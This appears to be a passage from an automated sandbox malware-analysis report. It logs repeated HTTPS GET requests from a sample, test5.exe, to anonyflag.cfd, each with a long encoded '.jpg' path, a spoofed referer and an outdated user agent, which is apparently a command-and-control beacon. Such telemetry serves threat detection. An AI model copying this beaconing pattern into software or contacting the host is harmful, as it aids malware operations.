                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:35 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XlAMoKNLVTbyAydZ4BwdAdCHJFTidQaNRHInSUJAuq2pm1CpSLq091OiTQ1Ar3FYH9SSXVpl77%2FuC8CheLdFefDOMis%2BF8lD%2BSIExA5V3oiVUANaFWHzA3%2FUwy8Suble"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea764af91849-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1472&rtt_var=569&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1894873&cwnd=180&unsent_bytes=0&cid=76df2267e11b8122&ts=511&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    51192.168.2.449875104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:36 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:37 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:37 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:37 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YctDLF0ebprY88S%2FgBW04vL00cx85iE2hqgHHWdB1haOgfR%2FGlc70wgxYEzzCVD%2FsgS%2BF1NOEN60SNpXIC7aC8P62eryW8bnskXUyZDE3HKYdurG%2FyO5OuhjNoy7drOq"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea832a526a59-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1587&rtt_var=607&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1783750&cwnd=246&unsent_bytes=0&cid=ed200f0d2f5ebd79&ts=503&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    52192.168.2.449879104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:39 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:39 UTC882INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:39 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:39 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iiu3JQaYbflTUoYn%2BzzC6BTFRG1oYSFUK9oE%2BIGtXWrZozjoKJGSJIH1nOi%2FIaSWuZuCvBKtnEqqu5X883VPzr%2FolLrqRsdwjkFzF9n%2F%2FAhxVKn5WxD73i1wKIYwCQzV"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea90ba0443ac-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1677&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1635854&cwnd=181&unsent_bytes=0&cid=0f366e50e3a5d320&ts=505&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    53192.168.2.449884104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:40 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:41 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:41 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:41 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B6cmq5vyQULzb%2Fse8HwrS16dtqYVRagTvQeEnFjDSqIKTUpUv2z7v79kKF8SBWrpjA6IrHYPK%2Bckcwyt4tcDxufyXYvabt81q8bU0rgpIw5%2Bb3TeZL3E9fhI1yAn94JJ"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ea9ccb388ccd-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1949&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1468074&cwnd=195&unsent_bytes=0&cid=a84eb0ad6e7b2f4b&ts=513&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    54192.168.2.449888104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:42 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:43 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:43 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:43 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=II1XKat6k2mrQ98iUfxHgHayL6DP9dYC6AZnhu7PNegFa1gxQj6ppB0jDfI1rTRxSWBQElByDPieeN8cwaHYMVpSBhIR6gxDtkuXlhX2wWC4zIpHRQqU7FbqKX%2FGW8xZ"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eaa83bbb4299-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1629&rtt_var=709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1442687&cwnd=251&unsent_bytes=0&cid=8c25e55b5eb16445&ts=493&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    55192.168.2.449894104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:44 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:45 UTC872INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:45 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:45 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OgY9izGfrl3La3p4WGtcEa51HzQJGuKCp8HjZcvEYftRXIApk9VAr%2FBGInZ0uTz6Rb7S9dG0oXRlvbjYyRdTxQg6bdvoQ2ji7eV9GtS2qJR69RnwH2z1xsKg0XgKZdWl"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eab43fd55e65-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1677&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1664766&cwnd=242&unsent_bytes=0&cid=99310fbbcc9629ea&ts=515&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    56192.168.2.449900104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:46 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:47 UTC886INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:46 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: HIT
                    Age: 1
                    Last-Modified: Sat, 28 Dec 2024 10:37:45 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvlCYEHDh%2BYuX%2B029HZjKG7WLgf0E8A%2BuwPW6KUKOwXk523fm7DJX0AU1%2B1cJPX8dYi0ewv3D5jrzCKVOj7szyAu1MlGamAGAdzGmhq0%2B8%2BHMO7niesmcnqXCIC1jbM1"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eabff877436f-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2025&min_rtt=1999&rtt_var=803&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1319475&cwnd=182&unsent_bytes=0&cid=ec990120fa8adad1&ts=459&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    57192.168.2.449904104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:48 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:48 UTC874INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:48 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:48 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2Bnqc5DBNF0aQVCXPGRK6J1HNR7GVeOcesbOe37f7e5OSD6MbjCMV6FsBk4DKf17RvhwQw1CSShe5YDq33%2FjHHeoGsaCAprqjgmMQHnqAPHads80p9WNPWK6L7gNTVzn"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eacb6d810f85-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1461&rtt_var=558&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1941489&cwnd=204&unsent_bytes=0&cid=5beca4df4312076c&ts=500&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    58192.168.2.449909104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:50 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:50 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:50 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:50 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlxdtfZKS3tyEpP8Z%2BnokUKRkyifUxPP4CIfSKP8JA41189ABOjkzWNr9BQVTLeRf6rXtQ%2BVuevS2P5kvmjLZDkscXBC%2Bm%2BZF8a509kMBrY8WGGEO9ihB0qQ4KRihRqE"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90ead77c4c42bc-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1645&rtt_var=715&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1189&delivery_rate=1432074&cwnd=225&unsent_bytes=0&cid=d7ea6068897f536f&ts=514&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    59192.168.2.449915104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:52 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:52 UTC884INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:52 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:52 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ssHvisfquwi3%2BePT772ikHN%2FNaQqutVI%2BEukeqEscooOEBlocEsdWfrQA6InNq3hvMP4Auhg3SR%2FePUEka%2FGlh59brxM1cXvz59OthsfIa%2BXcvHEv%2BbInChn5onTnq7P"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eae33e0b8c30-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1781&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1604395&cwnd=215&unsent_bytes=0&cid=ab35e64ca3246ee4&ts=521&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    60192.168.2.449921104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:54 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:54 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:54 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:54 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvdkoVEJYHiv1J%2BqC9enkv5b1GConLhpis0QO4WThXiNYuq7f2PxF%2FpPrKH%2FJj9fRollQ%2FWy0NpoLP5NXGdHz3IdbKXEcLSnalxzN5z0jIwodjamTXeyitoECIxQua2k"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eaf0dc380cb0-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1605&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1189&delivery_rate=1730883&cwnd=243&unsent_bytes=0&cid=5282301518a155bd&ts=509&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.449926104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:56 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:56 UTC876INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:56 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:56 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Q6MRf%2B3riK1Jh4pXBuFPsmKvTwpZ6U3aVqXi3u4TDOkK5GO49MxX%2BAUQ2JRSCiw3ngTlv7aHiKu%2BpUgrcMLPN2YFKfgEcdIlbb7ZGfGC7vLdVqzSlWjXdvSOEe6Uoiv"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eafc3bb9428b-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1583&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1831869&cwnd=240&unsent_bytes=0&cid=842869483a541a69&ts=491&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.449931104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:37:58 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:37:58 UTC878INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:37:58 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:37:58 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIhu6jM%2B0cL9NI5TYxGlFG7yFSzt01TGll%2FqNhzQ8RWPn0JO2T8hmuzMnYwRE8m17QibNjpQexhzWZ%2FIXIdOWNyD7xiw5db%2FLd1fk2ijUna9guPlBxocr712cikGcOez"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eb083ec87cee-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1996&rtt_var=758&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1433480&cwnd=176&unsent_bytes=0&cid=2311887fd77738b6&ts=511&x=0"


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.449937104.21.34.54436608C:\Users\user\Desktop\test5.exe
                    TimestampBytes transferredDirectionData
                    2024-12-28 10:38:00 UTC575OUTGET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8
                    Referer: http://www.google.com
                    Host: anonyflag.cfd
                    Pragma: no-cache
                    Cache-Control: no-cache
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
                    Connection: Keep-Alive
                    2024-12-28 10:38:00 UTC880INHTTP/1.1 200 OK
                    Date: Sat, 28 Dec 2024 10:38:00 GMT
                    Content-Type: img/jpg
                    Content-Length: 0
                    Connection: close
                    Cache-Control: max-age=14400
                    X-Powered-By: Apache
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Sat, 28 Dec 2024 10:38:00 GMT
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KXeN7KPIRpYz1Oq5km9lTpu%2B%2B07tuTKS0F1St1d4v%2BuqGL5F18LFIvW41qiHZAyxw4PcEgJMxeiKgeXHMUBV2UIsjgy4uFGH10X4wAbqZphoPxxds%2B7BOJqWOqM%2B6jVd"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f90eb13eacc0c7a-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1606&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1189&delivery_rate=1788120&cwnd=200&unsent_bytes=0&cid=473a83e73a533fe9&ts=501&x=0"


                    Click to jump to process

                    Click to jump to process

                    Target ID:0
                    Start time:05:35:56
                    Start date:28/12/2024
